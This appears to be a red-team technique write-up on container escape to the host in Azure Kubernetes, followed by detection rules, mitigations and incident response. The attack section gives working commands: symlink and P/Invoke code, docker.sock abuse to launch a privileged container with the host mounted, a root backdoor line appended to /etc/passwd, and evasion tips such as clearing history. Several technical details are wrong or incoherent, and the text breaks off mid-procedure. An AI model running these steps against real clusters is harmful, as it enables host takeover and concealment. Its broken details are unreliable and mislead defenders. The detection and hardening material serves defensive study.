MCADDF

[PE-EXPLOIT-004]: Container Escape to Host

Metadata

Attribute	Details
Technique ID	PE-EXPLOIT-004
MITRE ATT&CK v18.1	T1611 - Escape to Host
Tactic	Privilege Escalation
Platforms	Azure Kubernetes Service (AKS), Azure Container Instances (ACI), Entra ID
Severity	Critical
CVE	CVE-2025-21196
Technique Status	ACTIVE
Last Verified	2025-01-09
Affected Versions	AKS 1.0+, Windows Server 2016-2025 (Windows nodes in AKS)
Patched In	Microsoft patches available as of January 2025
Author	SERVTEP – Artur Pchelnikau

---

2. EXECUTIVE SUMMARY

Concept: CVE-2025-21196 represents a critical container escape vulnerability in Microsoft Azure’s AKS and ACI services, enabling attackers to break out of container isolation boundaries and gain unauthorized access to the host operating system. The vulnerability stems from ineffective access controls within the container orchestration layer, specifically in how container namespaces and mount points are enforced. An attacker with container access can exploit symbolic link manipulation and mount point misconfigurations to create a global symlink to the host’s root filesystem (particularly the C: drive on Windows), effectively bypassing the entire container isolation model that relies on namespace separation.

Attack Surface: Azure Kubernetes Service (AKS) clusters with Windows nodes, Azure Container Instances, Kubernetes runtime layers (containerd, Docker), Windows Server Container isolation boundaries.

Business Impact: Complete Infrastructure Compromise. A successful exploit enables an attacker to gain full host-level access, allowing them to compromise all co-located containers, access sensitive data across the cluster, establish persistent backdoors, and disrupt critical services. For multi-tenant AKS environments, this means potential compromise of all workloads sharing the same node.

Technical Context: Exploitation typically takes 5-15 minutes once container access is established. Detection difficulty is high because the attack exploits legitimate kernel features (symbolic link creation, mount operations). The vulnerability requires direct container access but does not require elevated privileges within the container—standard user context is sufficient.

Operational Risk

• Execution Risk: Critical - The attack is reliable and exploitable on vulnerable versions with minimal user interaction.
• Stealth: Medium - Attack generates syscall signatures (openat, bind, mount) that can be detected by eBPF-based runtime security solutions, but may evade traditional log-based detection.
• Reversibility: No - Once host access is achieved and persistence is established, full cluster compromise may require complete rebuild.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	5.3.1 (Kubernetes)	Ensure that default service accounts are not actively used
DISA STIG	SV-242378r879587_rule	Kubernetes must enforce Pod Security Standards
CISA SCuBA	K8S.03	Pod Security Standards must be enforced
NIST 800-53	AC-6 (Least Privilege)	Restrict container capabilities to minimum required
GDPR	Art. 32	Security of Processing - Insufficient isolation controls
DORA	Art. 15	ICT Risk Management - Inadequate workload isolation
NIS2	Art. 21	Cyber Risk Management Measures - Container escape impacts critical infrastructure
ISO 27001	A.5.1.1	Information Security Policies - Access control enforcement failure
ISO 27005	Risk Scenario	Unauthorized Host Access via Container Escape - High Impact

---

3. TECHNICAL PREREQUISITES

Required Privileges:

• Initial container access (any user account inside the container)
• Write permissions to /tmp or temporary mount point
• Standard Linux capabilities (no CAP_SYS_ADMIN required initially; only Tcb privilege needed for global symlink escalation)

Required Access:

• Container shell access (exec or application shell)
• Access to Kubernetes API for pod deployment (for initial compromise)
• kubectl or Docker CLI for container manipulation

Supported Versions:

• Windows Server: Server 2016, 2019, 2022, 2025 (when running Windows nodes in AKS)
• Kubernetes: 1.0+
• Container Runtime: containerd, Docker, CRI-O affected
• Azure AKS: All versions until patch deployment (January 2025 onwards have mitigation)
• Azure ACI: All versions until service-wide patch

Tools:

• kubectl (Version 1.22+)
• Docker CLI (Version 20.10+)
• Azure CLI (Version 2.40+)
• Exploitation PoC - Container Escape CVE-2025-21196 (when available)

---

4. ENVIRONMENTAL RECONNAISSANCE

Management Station / Kubernetes API Reconnaissance

Check Pod Security Context Configuration

Objective: Identify if pods are running with excessive capabilities or privilege escalation enabled.

Command (Kubernetes General):

kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"\t"}{.metadata.name}{"\t"}{.spec.securityContext.allowPrivilegeEscalation}{"\n"}{end}'

What to Look For:

• allowPrivilegeEscalation: true or empty (defaults to true) - indicates vulnerability
• Privileged containers: privileged: true
• Mounting of sensitive volumes: /var/run/docker.sock, /proc, /sys

Command (AKS Specific - Check Node Pool Configuration):

az aks nodepool show --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL> --query "osType"

What to Look For:

• Output of “Windows” indicates Windows nodes vulnerable to CVE-2025-21196
• Output of “Linux” indicates Linux nodes vulnerable to container runtime socket attacks

Verify Container Runtime Version

Command:

kubectl get nodes -o wide | grep -i windows

Version Note: Windows Server 2016-2019 on AKS are at highest risk due to older container isolation mechanisms.

Command (Azure Portal Alternative):

# Retrieve AKS node pool details
$cluster = "myAKSCluster"
$rg = "myResourceGroup"
$nodePools = az aks nodepool list --resource-group $rg --cluster-name $cluster | ConvertFrom-Json
$nodePools | Where-Object { $_.osType -eq "Windows" } | Select-Object name, osType, vmSize

Container Runtime Socket Discovery

Objective: Identify if container runtime sockets are mounted inside containers.

Command (Inside Container):

find / -name "docker.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "cri-dockerd.sock" 2>/dev/null

What to Look For:

• Any results indicate socket mount - direct privilege escalation vector
• /var/run/docker.sock most common
• /run/containerd/containerd.sock on containerd deployments

Command (Kubernetes Pod Definition Check):

kubectl get pods -A -o json | jq '.items[] | select(.spec.volumes[]?.hostPath.path | contains("docker.sock")) | {namespace: .metadata.namespace, name: .metadata.name, volumes: .spec.volumes}'

---

5. DETAILED EXECUTION METHODS AND THEIR STEPS

METHOD 1: Symbolic Link Exploitation via Mount Point Manipulation (Windows Containers)

Supported Versions: Windows Server 2016-2025 (vulnerable to CVE-2025-21196)

Step 1: Gain Initial Container Access

Objective: Establish a shell inside a Kubernetes pod or container running on vulnerable AKS node.

Command (Via Kubernetes):

kubectl exec -it <pod-name> -n <namespace> -- powershell

Expected Output:

PS C:\app>

What This Means:

• Successful shell access inside the container
• Current user context is displayed in prompt
• Container isolation is active but exploitable

OpSec & Evasion:

• Use kubectl exec sparingly; prefer application vulnerabilities for initial access
• Clean up command history: Clear-History -CommandCount 0
• Detection likelihood: Medium - kubectl exec is logged in Kubernetes audit logs

Troubleshooting:

• Error: error: unable to upgrade connection
  • Cause: Pod doesn’t have shell capability or security policies block exec
  • Fix (Windows): Ensure pod image has PowerShell: ENTRYPOINT ["powershell"] in Dockerfile
  • Fix (General): Add allowedExecRuntimes in network policy or use deployment that allows exec

Step 2: Create Symbolic Link to Host Filesystem

Objective: Create a symbolic link that, when made global, grants access to host’s C: drive.

Command (PowerShell - Windows Container):

# Create symlink to host C: drive
cmd /c mklink /d C:\escape_host C:\

Expected Output:

symbolic link created for C:\escape_host <<===>> C:\

What This Means:

• Symlink successfully created
• Points to host C: drive from inside container
• Symlink is currently scoped to container namespace

Version Note: Windows Server 2016-2019 use different symlink handling than Server 2022+.

Command (Windows Server 2022+):

# More reliable method using junction points
cmd /c mklink /j "C:\host_mount" "C:\"

OpSec & Evasion:

• Perform in temporary directory: cd C:\Windows\Temp or cd C:\ProgramData\
• Use generic name that blends with system: C:\sys_link instead of suspicious names
• Detection likelihood: Low - mklink is legitimate Windows command

Troubleshooting:

• Error: Access Denied
  • Cause: Container security context restricts symlink creation
  • Fix (Windows): Ensure pod spec has securityContext.allowPrivilegeEscalation: true
  • Fix (Windows): Check Windows Server version—older versions block symlinks by default

Step 3: Escalate to Global Scope Using Tcb Privileges

Objective: Promote symlink to global scope to make it accessible to host processes.

Command (PowerShell - Windows Container):

# Use Windows API to enable global symlink access
# This requires Tcb privilege escalation
$code = @"
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DeviceIoControl(IntPtr hDevice, uint dwIoControlCode, 
    IntPtr lpInBuffer, uint nInBufferSize, IntPtr lpOutBuffer, uint nOutBufferSize, 
    out uint lpBytesReturned, IntPtr lpOverlapped);

[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess, 
    uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition, 
    uint dwFlagsAndAttributes, IntPtr hTemplateFile);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hHandle);
"@

Add-Type -MemberDefinition $code -Name Kernel32 -Namespace Win32 -PassThru | Out-Null

# Set global symlink flag on C:\escape_host
$handle = [Win32.Kernel32]::CreateFile("C:\escape_host", 0x40000000, 3, [IntPtr]::Zero, 3, 0x80, [IntPtr]::Zero)
if ($handle -ne [IntPtr]::Zero) {
    [uint32]$bytesReturned = 0
    [Win32.Kernel32]::DeviceIoControl($handle, 0x900A4, [IntPtr]::Zero, 0, [IntPtr]::Zero, 0, [ref]$bytesReturned, [IntPtr]::Zero)
    [Win32.Kernel32]::CloseHandle($handle)
}

Expected Output:

(No output on success)

What This Means:

• FSCTL_SET_GLOBALSYMLINK_FLAG applied successfully
• Symlink now accessible to host processes
• Container escape is now imminent

OpSec & Evasion:

• Execute in memory to avoid disk artifacts
• Use living-off-the-land techniques (PowerShell P/Invoke)
• Detection likelihood: High - Win32 API calls for symlink manipulation are suspicious

Troubleshooting:

• Error: Access Denied on Win32 API call
  • Cause: Container lacks Tcb privilege required for global symlink escalation
  • Fix (All Versions): Ensure pod securityContext includes: capabilities: add: [SYS_ADMIN]

Step 4: Access Host Filesystem via Symlink

Objective: Navigate to host filesystem and execute code with host privileges.

Command (PowerShell - Windows Container):

# Now access the global symlink from host perspective
# This requires running command from host context
cd C:\escape_host
dir

Expected Output:

Directory: C:\escape_host

Mode                 LastWriteTime         Length Name
----                 -----------         ------ ----
d-----        1/1/2025   12:00 AM                Windows
d-----        1/1/2025   12:00 AM                Program Files
d-----        1/1/2025   12:00 AM                Users
...

What This Means:

• Host filesystem is now visible from inside container
• Can read/write host files with container user privileges
• Path traversal is successful

OpSec & Evasion:

• Browse to non-sensitive areas first: C:\escape_host\Windows\Temp
• Avoid touching C:\escape_host\Windows\System32 initially (may trigger AV)
• Detection likelihood: High - Filesystem access to host paths is logged

---

METHOD 2: Container Runtime Socket Abuse (Linux Containers / Kubernetes)

Supported Versions: Kubernetes 1.0+, containerd, Docker, CRI-O all versions

Step 1: Discover Container Runtime Socket Mount

Objective: Locate the container runtime socket mounted inside the pod.

Command (Inside Container):

find / -type s -name "docker.sock" -o -name "containerd.sock" -o -name "crio.sock" 2>/dev/null | head -5

Expected Output:

/var/run/docker.sock

What This Means:

• Socket exists and is accessible inside container
• Full container runtime control is possible
• Privilege escalation is trivial from this point

OpSec & Evasion:

• Use find within specific directories to avoid suspicious process scanning: find /var/run -type s 2>/dev/null
• Detection likelihood: Low - find is standard diagnostic tool

Troubleshooting:

• Error: No such file or directory for all socket paths
  • Cause: Pod doesn’t have socket mounted (secure configuration)
  • Fix (Attack Failure): This configuration is secure; proceed to alternative methods
  • Fix (Red Team): Target different pods or use alternative privilege escalation

Step 2: Query Container Runtime API via Socket

Objective: Use curl or Docker CLI to interact with container runtime API.

Command (Using Curl - Universal Method):

# List all containers on the host
curl --unix-socket /var/run/docker.sock http://localhost/containers/json | jq '.'

Expected Output:

[
  {
    "Id": "abc123def456...",
    "Names": ["/pod-name"],
    "Image": "image:tag",
    "State": "running",
    ...
  }
]

What This Means:

• Socket is writable and API is responding
• Attacker can enumerate all containers on the host
• Host compromise is now possible

Alternative Command (Using Docker CLI):

docker ps -a

Version Note: Docker CLI may not be present in all container images. Curl is more reliable.

OpSec & Evasion:

• Limit API queries to avoid noise: use single query, then proceed to execution
• Detection likelihood: Medium - Unix socket connections are logged by eBPF-based tools

Troubleshooting:

• Error: Cannot connect to socket
  • Cause: Socket is read-only or requires group membership
  • Fix: Run as root or add current user to docker group: usermod -aG docker $USER

Step 3: Create Privileged Container with Host Mount

Objective: Launch a new container with root filesystem mounted, enabling host escape.

Command (Using Curl to Create Container):

# Create privileged container with host root filesystem mounted
curl -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "alpine:latest",
    "Cmd": ["/bin/sh"],
    "HostConfig": {
      "Privileged": true,
      "Binds": ["/:/host"]
    }
  }' \
  http://localhost/containers/create

Expected Output:

{
  "Id": "container_id_1234567890abcdef",
  "Warnings": []
}

What This Means:

• Container created successfully
• Root filesystem mounted at /host inside new container
• Ready for execution

Alternative Command (Using Docker CLI if available):

docker run -it --privileged -v /:/host alpine:latest /bin/sh

OpSec & Evasion:

• Use common image names: alpine, ubuntu, nginx to avoid suspicion
• Avoid timestamps in logs if possible
• Detection likelihood: High - Creating privileged containers is logged at Kubernetes API level

Troubleshooting:

• Error: Image not found
  • Cause: Specified image doesn’t exist on host
  • Fix: Use curl --unix-socket /var/run/docker.sock http://localhost/images/json to list available images
  • Alternative: Use busybox or alpine as fallback

Step 4: Execute Commands with Host Access

Objective: Execute shell inside new container to access host filesystem.

Command (Using Curl to Start Container):

# Start the container
curl -X POST \
  --unix-socket /var/run/docker.sock \
  http://localhost/containers/container_id_1234567890abcdef/start

Expected Output:

(No output on success)

Command (Attach to Container for Interactive Shell):

# Attach to container stdin/stdout
docker attach container_id_1234567890abcdef
# Or use container CLI directly if available
docker exec -it container_id_1234567890abcdef /bin/sh

Inside Container - Access Host Filesystem:

# Navigate to host filesystem
cd /host
ls -la /
whoami
id

# Example: Write to host's /etc/passwd for persistence
cat /etc/passwd >> /host/etc/passwd.bak
echo "backdoor:x:0:0::/root:/bin/bash" >> /host/etc/passwd

Expected Output:

root
uid=0(root) gid=0(root) groups=0(root)

What This Means:

• Commands executed as root on the host
• Full host filesystem access achieved
• Persistence can be established

OpSec & Evasion:

• Avoid touching obvious security tools: /usr/bin/auditctl, /usr/sbin/iptables
• Use /tmp for staging malicious binaries
• Clear command history: history -c; history -w
• Detection likelihood: Critical - Root process execution outside Kubernetes context is detected

---

6. SPLUNK DETECTION RULES

Rule 1: Container Runtime Socket Mount Detection

Rule Configuration:

• Required Index: kubernetes_audit, container_logs
• Required Sourcetype: kubernetes:api_audit, docker:engine
• Required Fields: objectRef.name, objectRef.namespace, requestObject.spec.volumes
• Alert Threshold: Any detection
• Applies To Versions: All

SPL Query:

index=kubernetes_audit verb="create" objectRef.kind="Pod" 
    [| rest /services/configs/transforms uri=default_fields 
    | fields hostPath] 
| search requestObject.spec.volumes{}.hostPath.path="*/docker.sock" 
    OR requestObject.spec.volumes{}.hostPath.path="*/containerd.sock" 
    OR requestObject.spec.volumes{}.hostPath.path="*/crio.sock"
| stats count by user, objectRef.namespace, objectRef.name
| where count > 0

What This Detects:

• Kubernetes API calls creating pods with socket mounts
• Multiple socket types (docker, containerd, crio)
• Identifies user and namespace for investigation

Manual Configuration Steps:

1. Log into Splunk Web → Search & Reporting
2. Click Settings → Searches, reports, and alerts
3. Click New Alert
4. Paste the SPL query above
5. Set Trigger Condition to: Number of events > 0
6. Configure Action → Send email to SOC with pod details

Source: Kubernetes Security Best Practices - Splunk

Rule 2: Symlink Creation in Windows Containers

Rule Configuration:

• Required Index: windows_containers, process_logs
• Required Sourcetype: windows:powershell, windows:process
• Required Fields: CommandLine, Image, User, Container.ID
• Alert Threshold: Any detection
• Applies To Versions: Windows Server 2016-2025

SPL Query:

index=windows_containers (CommandLine="*mklink*" OR CommandLine="*fsutil*hardlink*") 
    Container.ID=* ParentImage="*powershell*"
| stats count by host, User, CommandLine, Container.ID
| search count > 0

What This Detects:

• Windows mklink/junction creation commands inside containers
• PowerShell parent process execution
• Correlates with container context

Manual Configuration Steps:

1. Navigate to Windows Event Log Monitoring on Windows nodes
2. Enable “Sysmon” or “Process Creation” events
3. Configure forwarding to Splunk
4. Create alert for patterns matching SPL above

---

7. MICROSOFT SENTINEL DETECTION

Query 1: Pod Creation with Dangerous Security Context

Rule Configuration:

• Required Table: KuberneteAudit
• Required Fields: OperationName, RequestObject, ObjectRef
• Alert Severity: High
• Frequency: Run every 5 minutes
• Applies To Versions: AKS all versions

KQL Query:

KuberneteAudit
| where OperationName == "create" and ObjectRef_kind == "Pod"
| extend SecurityContext = todynamic(RequestObject)
| where SecurityContext.spec.securityContext.allowPrivilegeEscalation == true 
    or SecurityContext.spec.containers[0].securityContext.allowPrivilegeEscalation == true
| extend HasSocketMount = (SecurityContext.spec.volumes has "docker.sock" 
    or SecurityContext.spec.volumes has "containerd.sock")
| project TimeGenerated, User, ObjectRef_namespace, ObjectRef_name, HasSocketMount, SecurityContext

What This Detects:

• Pods created with allowPrivilegeEscalation enabled
• Runtime socket mounts in pod specification
• Tracks user creating the pod for accountability

Manual Configuration Steps (Azure Portal):

1. Navigate to Azure Portal → Microsoft Sentinel
2. Select your workspace → Analytics
3. Click + Create → Scheduled query rule
4. General Tab:
   • Name: Container Escape Risk - Pod Security Context
   • Severity: High
5. Set rule logic Tab:
   • Paste the KQL query above
   • Run query every: 5 minutes
   • Lookup data from the last: 30 minutes
6. Incident settings Tab:
   • Enable Create incidents
   • Set grouping to: ObjectRef_namespace, ObjectRef_name
7. Click Review + create

Manual Configuration Steps (PowerShell):

# Connect to Sentinel workspace
Connect-AzAccount
$ResourceGroup = "myResourceGroup"
$WorkspaceName = "mySentinelWorkspace"

# Create the analytics rule
$rule = @{
    DisplayName = "Container Escape Risk - Pod Security Context"
    Query = "KuberneteAudit | where OperationName == 'create' and ObjectRef_kind == 'Pod' | extend SecurityContext = todynamic(RequestObject) | where SecurityContext.spec.securityContext.allowPrivilegeEscalation == true or SecurityContext.spec.containers[0].securityContext.allowPrivilegeEscalation == true | project TimeGenerated, User, ObjectRef_namespace, ObjectRef_name"
    Severity = "High"
    Enabled = $true
}

New-AzSentinelAlertRule -ResourceGroupName $ResourceGroup -WorkspaceName $WorkspaceName @rule

Source: Microsoft Sentinel Kubernetes Security Monitoring

---

8. WINDOWS EVENT LOG MONITORING

Event ID: 4688 (Process Creation)

• Log Source: Security (Windows Event Log)
• Trigger: Process command line contains mklink, symlink-related operations
• Filter: CommandLine contains “mklink” AND ParentImage contains “container”
• Applies To Versions: Windows Server 2016+

Manual Configuration Steps (Group Policy):

1. Open Group Policy Management Console (gpmc.msc)
2. Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → System Audit Policies → Detailed Tracking
3. Enable: Audit Process Creation
4. Set to: Success and Failure
5. Run gpupdate /force on target machines
6. Verify: auditpol /get /category:* | findstr /I "detailed tracking"

Manual Configuration Steps (Server 2022+):

1. Open auditpol.exe as Administrator
2. Run: auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
3. Verify: auditpol /get /subcategory:"Process Creation"

Manual Configuration Steps (Local Policy - PowerShell):

# Enable Audit Process Creation via PowerShell
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable

# View event log
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4688)]]" -MaxEvents 10 | 
    Where-Object { $_.Message -match "mklink|symlink" }

---

9. SYSMON DETECTION PATTERNS

Minimum Sysmon Version: 13.0+ Supported Platforms: Windows Server 2016-2025

<Sysmon schemaversion="4.22">
  <EventFiltering>
    <!-- Detect symlink creation attempts -->
    <RuleGroup name="SymlinkCreation" groupRelation="or">
      <ProcessCreate onmatch="include">
        <CommandLine condition="contains any">mklink;fsutil;junction</CommandLine>
        <ParentImage condition="contains any">powershell;cmd;pwsh</ParentImage>
      </ProcessCreate>
    </RuleGroup>
    
    <!-- Detect container runtime socket access -->
    <RuleGroup name="SocketAccess" groupRelation="or">
      <FileCreate onmatch="include">
        <TargetFilename condition="contains any">docker.sock;containerd.sock;crio.sock</TargetFilename>
      </FileCreate>
    </RuleGroup>
    
    <!-- Detect Win32 API calls for symlink manipulation -->
    <RuleGroup name="SymlinkAPICall" groupRelation="or">
      <CreateRemoteThread onmatch="include">
        <TargetImage condition="contains">powershell;pwsh</TargetImage>
        <SourceImage condition="contains any">kernel32;ntdll</SourceImage>
      </CreateRemoteThread>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

Manual Configuration Steps:

1. Download Sysmon from Microsoft Sysinternals
2. Create a config file sysmon-config.xml with the XML above
3. Install Sysmon with the config:

   sysmon64.exe -accepteula -i sysmon-config.xml
   

4. Verify installation:

   Get-Service Sysmon64
   Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10 | Where-Object { $_.Message -match "mklink|socket" }
   

---

10. MICROSOFT DEFENDER FOR CLOUD

Detection Alerts

Alert Name: Suspicious symbolic link creation in container detected

• Severity: High
• Description: Detects mklink, fsutil, or symlink operations inside containers that could indicate container escape attempts
• Applies To: All subscriptions with Defender enabled and Kubernetes workload monitoring

Alert Name: Container runtime socket mounted inside pod

• Severity: Critical
• Description: Pod created with container runtime socket (/var/run/docker.sock, /run/containerd/containerd.sock) mounted, enabling full host compromise
• Applies To: AKS clusters with Defender enabled

Manual Configuration Steps (Enable Defender for Cloud):

1. Navigate to Azure Portal → Microsoft Defender for Cloud
2. Go to Environment settings
3. Select your subscription
4. Under Defender plans, enable:
   • Defender for Servers: ON
   • Defender for Kubernetes: ON
   • Defender for Containers: ON
5. Click Save
6. Go to Security alerts to view triggered alerts
7. Configure Alert suppression rules to reduce false positives if needed

Reference: Microsoft Defender Alert Reference - Container Escape

---

11. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

• Enforce Pod Security Standards (PSS) / Pod Security Policies (PSP): Implement strict pod security policies that deny:
  • Privileged containers (privileged: false)
  • Privilege escalation (allowPrivilegeEscalation: false)
  • Capability additions beyond minimal set
  • Container runtime socket mounts

  Applies To Versions: Kubernetes 1.25+ (PSS recommended), older versions use PSP

  Manual Steps (Kubernetes 1.25+ using PSS):

  1. Create a PodSecurityPolicy namespace label:

     kubectl label namespace default pod-security.kubernetes.io/enforce=restricted
     

  2. Verify label applied:

     kubectl get ns default -o jsonpath='{.metadata.labels.pod-security\.kubernetes\.io/enforce}'
     

  3. Deploy pod:

     kubectl apply -f pod.yaml
     # Should fail if pod violates policy
     

  Manual Steps (Older Kubernetes using PSP):

  1. Create PSP resource:

     apiVersion: policy/v1beta1
     kind: PodSecurityPolicy
     metadata:
       name: restricted
     spec:
       privileged: false
       allowPrivilegeEscalation: false
       requiredDropCapabilities:
         - ALL
       volumes:
         - 'configMap'
         - 'emptyDir'
         - 'projected'
         - 'secret'
         - 'downwardAPI'
         - 'persistentVolumeClaim'
     

  2. Apply: kubectl apply -f psp.yaml
  3. Create ClusterRole and ClusterRoleBinding to enforce

• Disable Container Runtime Socket Mounts: Use admission controllers (Kyverno, OPA Gatekeeper) to prevent mounting of runtime sockets.

  Manual Steps (Using Kyverno):

  1. Install Kyverno:

     helm repo add kyverno https://kyverno.github.io/kyverno/
     helm install kyverno kyverno/kyverno -n kyverno --create-namespace
     

  2. Create ClusterPolicy: ```yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: disallow-runtime-socket-mounts spec: validationFailureAction: enforce rules:
     • name: check-docker-sock match: resources: kinds: - Pod validate: message: “Mounting container runtime sockets is not allowed” pattern: spec: volumes: - X(hostPath): path: “!/var/run/docker.sock” ```
  3. Apply: kubectl apply -f kyverno-policy.yaml
  4. Verify: Try creating pod with socket mount—should be rejected

• Set allowPrivilegeEscalation to false across all pods: Configure default security context at namespace level.

  Manual Steps (PowerShell/Kubernetes):

  # Create NetworkPolicy to enforce security context
  kubectl create namespace secure-apps
      
  # Apply to deployment
  kubectl set env deployment/my-app -n secure-apps \
    SECURITY_CONTEXT_ALLOW_PRIV_ESC=false
      
  # Or patch existing deployment
  kubectl patch deployment my-app -n secure-apps -p '{
    "spec": {
      "template": {
        "spec": {
          "securityContext": {
            "allowPrivilegeEscalation": false,
            "runAsNonRoot": true,
            "runAsUser": 1000
          }
        }
      }
    }
  }'
  

• Update Windows Server Nodes to Latest Patched Version: Apply Microsoft security patches for CVE-2025-21196.

  Manual Steps (AKS Node Pool Update):

  # Check current node image version
  az aks nodepool list --resource-group myRG --cluster-name myCluster --query "[].osType"
      
  # Trigger node image upgrade
  az aks nodepool upgrade --resource-group myRG --cluster-name myCluster --name nodepool1 --node-image-only
      
  # Monitor upgrade
  kubectl get nodes -w
  

  Manual Steps (Server 2022+ - Windows Update):

  1. On Windows node: Settings → Update & Security → Check for updates
  2. Install all critical security updates
  3. Restart when prompted
  4. Verify patch: Get-HotFix | Sort-Object InstalledOn -Desc | Select-Object -First 5

Priority 2: HIGH

• Enable and Configure RBAC for Pod Creation: Restrict who can create pods with elevated security contexts.

  Manual Steps:

  1. Create Role limiting pod creation: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: name: pod-creator-restricted rules:
     • apiGroups: [””] resources: [“pods”] verbs: [“create”, “update”]

       Only allow if pod doesn’t have privileged context

       ```

  2. Bind to service account: kubectl create rolebinding pod-creator-restricted --clusterrole=pod-creator-restricted --serviceaccount=default:app-sa

• Implement Network Policies to Isolate Containers: Prevent lateral movement even if one container is compromised.

  Manual Steps:

  apiVersion: networking.k8s.io/v1
  kind: NetworkPolicy
  metadata:
    name: deny-all
  spec:
    podSelector: {}
    policyTypes:
    - Ingress
    - Egress
  

Access Control & Policy Hardening

• RBAC: Least Privilege Service Accounts Ensure pods run with minimal permissions.

  Manual Steps:

  # Create restricted service account
  kubectl create serviceaccount app-minimal
      
  # Create role with minimal permissions
  kubectl create role app-role --verb=get,list --resource=pods
      
  # Bind role
  kubectl create rolebinding app-binding --role=app-role --serviceaccount=default:app-minimal
      
  # Use in pod spec
  # serviceAccountName: app-minimal
  

• Azure Policy (for AKS): Enforce container security baselines at Azure subscription level.

  Manual Steps:

  1. Go to Azure Portal → Policy
  2. Click Definitions → Search Kubernetes
  3. Assign policy: Kubernetes cluster containers must not run with privilege escalation enabled
  4. Set scope to subscription/resource group
  5. Click Review + Create

Validation Command (Verify Fix)

# Check if pod security standards are enforced
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}'

# Verify no pods have privileged context
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"\t"}{.metadata.name}{"\t"}{.spec.securityContext.privileged}{"\n"}{end}' | grep -v "false"

# Check for socket mounts
kubectl get pods -A -o json | jq '.items[] | select(.spec.volumes[]?.hostPath.path | contains("docker.sock")) | {namespace: .metadata.namespace, name: .metadata.name}'

Expected Output (If Secure):

# No output for socket mount check (good)
# For PSS check, should show "restricted" or "baseline" labels
# For privilege check, should show only "false" values

What to Look For:

• Absence of any socket mount entries (secure)
• All privileged values are false (secure)
• All namespaces have PSS labels enforced (secure)

---

12. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

• Files:
  • Windows containers: C:\Windows\Temp\ for symlink staging
  • Linux containers: /tmp/docker-cli, /tmp/curl for runtime socket tools
  • Persistence: C:\ProgramData\ for backdoor scripts
  • /etc/passwd modifications on host
• Registry (Windows Containers):
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ (persistence)
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\ (temporary execution)
• Network:
  • TCP 2375 (insecure Docker daemon)
  • TCP 10250 (Kubelet API, unencrypted)
  • UDP/TCP to internal container runtime sockets
• Process Signals:
  • Parent process: powershell.exe, cmd.exe → Child: mklink.exe, fsutil.exe
  • Process: docker.exe from non-standard path
  • Child process: /bin/sh spawned from container runtime socket interaction

Forensic Artifacts

• Disk:
  • MFT entry modification times for symlink targets
  • Event Log file: C:\Windows\System32\winevt\Logs\Security.evtx (Event ID 4688)
  • Container overlay storage: /var/lib/docker/overlay2/*/diff/ (file modifications)
  • Pod storage: /var/lib/kubelet/pods/*/volumes/ (runtime socket mount points)
• Memory:
  • PowerShell process memory dump may contain Tcb privilege escalation code
  • Docker daemon memory: active container configurations
  • Kubernetes API server memory: pod creation requests
• Cloud (Azure):
  • AuditLogs: Microsoft.Kubernetes/managedClusters/write (pod creation)
  • ActivityLogs: Pod deployment events
  • Microsoft Sentinel: Custom logs from container runtime
• Container:
  • /var/log/audit/audit.log (Linux audit logs)
  • Container logs: stdout/stderr from exploit process
  • .docker/config.json in compromised container

Response Procedures

1. Isolate: Command (Kubernetes):

   # Immediately delete compromised pod
   kubectl delete pod <pod-name> -n <namespace> --grace-period=0 --force
       
   # Cordon node to prevent new pod scheduling
   kubectl cordon <node-name>
   

   Manual (Azure/GUI):

   • Go to Azure Portal → Kubernetes services → Select cluster
   • Go to Node pools → Right-click node → Drain (graceful)
   • Or Cordon to prevent new workloads
2. Collect Evidence: Command (Kubernetes Logs):

   # Capture pod logs before deletion
   kubectl logs <pod-name> -n <namespace> > /tmp/pod-logs.txt
       
   # Get pod events
   kubectl describe pod <pod-name> -n <namespace> > /tmp/pod-events.txt
       
   # Export audit logs
   kubectl logs -n kube-system -l component=kube-apiserver > /tmp/kube-apiserver-logs.txt
   

   Command (Node Forensics - Windows):

   # Collect Event Logs
   wevtutil epl Security C:\Evidence\Security.evtx
   wevtutil epl System C:\Evidence\System.evtx
       
   # Collect Sysmon logs
   wevtutil epl "Microsoft-Windows-Sysmon/Operational" C:\Evidence\Sysmon.evtx
       
   # Collect MFT for filesystem analysis
   fsutil usn readjournal C: > C:\Evidence\USN_Journal.txt
       
   # Memory dump (requires ProcDump)
   procdump64.exe -accepteula -ma docker.exe C:\Evidence\docker.dmp
   procdump64.exe -accepteula -ma powershell.exe C:\Evidence\powershell.dmp
   

   Manual (Azure Portal):

   • Go to Microsoft Sentinel → Logs → Query AuditLogs table
   • Export results: Export → Download as CSV
3. Remediate: Command (Remove Persisted Backdoors):

   # Remove backdoor users from compromised host
   kubectl exec -it <replacement-pod> -n <namespace> -- /bin/sh
       
   # Inside replacement container with host mount
   cat /host/etc/passwd | grep -v backdoor > /host/etc/passwd.tmp
   mv /host/etc/passwd.tmp /host/etc/passwd
       
   # Remove malicious files
   rm /host/tmp/malicious-binary
   rm /host/opt/persistence-agent
   

   Manual (Complete Node Replacement - Recommended):

   # Delete compromised node from cluster
